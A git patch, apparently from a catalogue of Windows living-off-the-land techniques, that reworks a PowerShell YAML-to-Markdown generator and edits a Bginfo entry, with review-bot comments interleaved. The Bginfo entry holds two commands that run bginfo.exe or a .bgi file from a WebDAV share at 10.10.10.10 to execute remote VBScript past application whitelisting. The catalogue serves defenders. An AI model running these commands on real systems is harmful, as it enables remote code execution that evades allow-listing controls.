From 7961a99173e64e1e16572a1632931f728accd5ff Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 25 Sep 2018 02:33:38 +0200
Subject: [PATCH] minor adjustments

---
 Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 | 234 ++++++++++++++++++--
 yml/OtherMSBinaries/Bginfo.yml | 10 +-
 2 files changed, 227 insertions(+), 17 deletions(-)

diff --git a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1 b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
index 57fdb38..d4657fa 100644
--- a/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
+++ b/Mgmt-Scripts/Draft-MDFromYaml-webportal.ps1
@@ -29,18 +29,226 @@ function Convert-YamlToMD
 "name: $($YamlObject.Name)"| Add-Content $Outfile
 "description: $($YamlObject.Description)"| Add-Content $Outfile
 "functions:"| Add-Content $Outfile
-
- foreach($cmd in $YamlObject.Commands)
+
+ $Exe = @()
+ $Down = @()
+ $Uplo = @()
+ $Enco = @()
+ $Deco = @()
+ $Copy = @()
+ $Cred = @()
+ $Comp = @()
+ $ADS = @()
+ $AWL = @()
+ $Reco = @()
+ $Dump = @()
+ foreach($grp in $YamlObject.Commands)
 {
- " $($cmd.Category):"| Add-Content $Outfile
- " - description: $($cmd.Description)"| Add-Content $Outfile
- " code: $($cmd.Command)"| Add-Content $Outfile
- " mitreid: $($cmd.MitreID)"| Add-Content $Outfile
- " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
- " operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
- " privileges: $($cmd.Privileges)"| Add-Content $Outfile
- " usecase: $($cmd.UseCase)"| Add-Content $Outfile
+ if($grp.Category -eq "Execute"){$Exe += $grp}
+ if($grp.Category -eq "Download"){$Down += $grp}
+ if($grp.Category -eq "Upload"){$Uplo += $grp}
+ if($grp.Category -eq "Encode"){$Enco += $grp}
+ if($grp.Category -eq "Decode"){$Deco += $grp}
+ if($grp.Category -eq "Alternate data streams"){$ADS += $grp}
+ if($grp.Category -eq "Copy"){$Copy += $grp}
+ if($grp.Category -eq "Credentials"){$Cred += $grp}
+ if($grp.Category -eq "Compile"){$Comp += $grp}
+ if($grp.Category -eq "AWL bypass"){$AWL += $grp}
+ if($grp.Category -eq "Reconnaissance"){$Reco += $grp}
+ if($grp.Category -eq "Dump"){$Dump += $grp}
 }
+
+ if($Exe)
+ {
+ " $($Exe[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Exe)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Down)
+ {
+ " $($Down[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Down)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Uplo)
+ {
+ " $($Uplo[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Uplo)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Enco)
+ {
+ " $($Enco[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Enco)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Deco)
+ {
+ " $($Deco[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Deco)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Copy)
+ {
+ " $($Copy[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Copy)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Cred)
+ {
+ " $($Cred[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Cred)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Comp)
+ {
+ " $($Comp[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Comp)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($ADS)
+ {
+ " $($ADS[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $ADS)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($AWL)
+ {
+ " $($AWL[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $AWL)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Reco)
+ {
+ " $($Reco[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Reco)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+ if($Dump)
+ {
+ " $($Dump[0].Category.ToLower()):"| Add-Content $Outfile
+ foreach($Ex in $Dump)
+ {
+ " - description: $($Ex.Description)"| Add-Content $Outfile
+ " code: $($Ex.Command)"| Add-Content $Outfile
+ " mitreid: $($Ex.MitreID)"| Add-Content $Outfile
+ " mitrelink: $($Ex.MitreLink)"| Add-Content $Outfile
+ " operatingsystem: $($Ex.Operatingsystem)"| Add-Content $Outfile
+ " privileges: $($Ex.Privileges)"| Add-Content $Outfile
+ " usecase: $($Ex.UseCase)"| Add-Content $Outfile
+ }
+ }
+
+ #$Groups = $YamlObject.Commands | Group-Object {$_.Category}
+ #" $($grp.Name):"| Add-Content $Outfile
+ #" - description: $($cmd.Description)"| Add-Content $Outfile
+ #" code: $($cmd.Command)"| Add-Content $Outfile
+ #" mitreid: $($cmd.MitreID)"| Add-Content $Outfile
+ #" mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
+ #" operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
+ #" privileges: $($cmd.Privileges)"| Add-Content $Outfile
+ #" usecase: $($cmd.UseCase)"| Add-Content $Outfile
+
+
+ #foreach($cmd in $YamlObject.Commands)
+ #{
+ #" $($cmd.Category):"| Add-Content $Outfile
+ # " - description: $($cmd.Description)"| Add-Content $Outfile
+ # " code: $($cmd.Command)"| Add-Content $Outfile
+ # " mitreid: $($cmd.MitreID)"| Add-Content $Outfile
+ # " mitrelink: $($cmd.MitreLink)"| Add-Content $Outfile
+ # " operatingsystem: $($cmd.Operatingsystem)"| Add-Content $Outfile
+ # " privileges: $($cmd.Privileges)"| Add-Content $Outfile
+ # " usecase: $($cmd.UseCase)"| Add-Content $Outfile
+ #}
 "resources:"| Add-Content $Outfile
 foreach($link in $YamlObject.Resources)
 {
@@ -124,10 +332,10 @@ function Invoke-GenerateMD
 #Generate the stuff!
 #Bins
 Invoke-GenerateMD -YmlPath "$mainpath\yml\OSBinaries" -Outpath "c:\tamp\Binaries" -Verbose
-#Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
+Invoke-GenerateMD -YmlPath "$mainpath\yml\OtherMSBinaries" -Outpath "c:\tamp\OtherMSBinaries" -Verbose
 ##Scripts
-#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
+Invoke-GenerateMD -YmlPath "$mainpath\yml\OSScripts" -Outpath "c:\tamp\Scripts" -Verbose
 ##Libs
-#Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
\ No newline at end of file
+Invoke-GenerateMD -YmlPath "$mainpath\yml\OSLibraries" -Outpath "c:\tamp\Libraries" -Verbose
\ No newline at end of file
diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml
index fe71d60..41a53f3 100644
--- a/yml/OtherMSBinaries/Bginfo.yml
+++ b/yml/OtherMSBinaries/Bginfo.yml
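Review bot: Every `code:`, `description:` and `usecase:` line in the twelve new per-category blocks writes the YAML value unquoted, so any command that contains `: ` or ` #`, or begins with a quote, `[`, `{`, `*`, `&`, `!`, `|` or `>`, produces front matter that the consuming parser misreads or rejects — the Bginfo.yml change in this same commit, which strips the `"..."` around two commands, looks like a workaround for exactly that. The escaping belongs in the generator rather than in the data: a helper that single-quotes the scalar and doubles embedded `'` makes every emitted value safe and also stops a yml entry from injecting additional front-matter keys into the portal page. The copy-pasted blocks additionally drop, without any message, every command whose Category is not one of the twelve literals, which for a detection corpus means an entry silently vanishes from the site; walking an ordered category list over `Group-Object` output keeps the fixed order and lets the leftovers be reported with Write-Warning. Convert-YamlToMD begins before and continues after this hunk, and the leading spaces of the emitted lines (lost in this collapsed diff) should be kept as they are in the file.
```powershell
# Single-quoted YAML scalars only need embedded quotes doubled; $null becomes ''.
function ConvertTo-YamlScalar([string]$Value) { "'" + ($Value -replace "'", "''") + "'" }

$CategoryOrder = "Execute","Download","Upload","Encode","Decode","Copy","Credentials",
                 "Compile","Alternate data streams","AWL bypass","Reconnaissance","Dump"
$ByCategory = $YamlObject.Commands | Group-Object { $_.Category }
foreach($name in $CategoryOrder)
{
    # -eq is case-insensitive, so "AWL Bypass" in the yml still matches, as it did before
    $grp = $ByCategory | Where-Object { $_.Name -eq $name }
    if(-not $grp) { continue }
    " $($name.ToLower()):"| Add-Content $Outfile
    foreach($Ex in $grp.Group)
    {
        " - description: $(ConvertTo-YamlScalar $Ex.Description)"| Add-Content $Outfile
        " code: $(ConvertTo-YamlScalar $Ex.Command)"| Add-Content $Outfile
        # … unchanged: mitreid, mitrelink, operatingsystem, privileges, usecase lines, each quoted the same way …
    }
}
foreach($u in ($ByCategory | Where-Object { $CategoryOrder -notcontains $_.Name }))
{
    Write-Warning "$($YamlObject.Name): $($u.Count) command(s) with unhandled category '$($u.Name)' were not written"
}
```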
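Review bot: The three Invoke-GenerateMD calls this hunk enables write to a fixed `c:\tamp\...` root while their input is resolved from `$mainpath`, so the script only works on a machine with that exact directory and anyone else running it gets four partially written output trees with no indication of why. Hoisting the root into one variable next to `$mainpath`, `$Outroot = "c:\tamp"`, and using `"$Outroot\Binaries"` and friends in the four calls makes the dependency visible and lets it be overridden in one place; the commented-out `##Scripts`/`##Libs` headers would also read better as `#Scripts`/`#Libs` to match `#Bins`. The file still ends without a trailing newline, as the two `\ No newline at end of file` markers show.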
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows
- - Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
+ - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: Execute bginfo.exe from a WebDAV server.
 Category: AWL Bypass
@@ -20,7 +20,7 @@ Commands:
 MitreID: T1218
 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
 OperatingSystem: Windows
- - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
+ - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
 Usecase: Remote execution of VBScript
 Description: This style of execution may not longer work due to patch.
 Category: AWL Bypass
@@ -30,8 +30,10 @@ Commands:
 OperatingSystem: Windows
 Full Path:
 - No fixed path
-Code Sample: []
-Detection: []
+Code Sample:
+ - Code:
+Detection:
+ - IOC:
 Resources:
 - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
 Acknowledgement:
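Review bot: `Detection:` now holds a one-element list whose entry `- IOC:` has a null value, so a consumer that iterates the list renders an empty indicator (or fails on the null) where the previous `[]` honestly said that nothing is documented; either keep `[]` until there is content or fill the entry in, and the same applies to `Code Sample: - Code:`. Given the two commands in the hunks above, a concrete entry would be along the lines of `- IOC: bginfo.exe launched from, or handed a .bgi file on, a UNC/WebDAV path` — adjust to whatever form the portal expects. The second command's `Description:` also reads `may not longer work due to patch`, which should be `may no longer work` and ideally name the Bginfo version or patch it refers to, since a defender reading the page cannot otherwise tell whether the technique is still live.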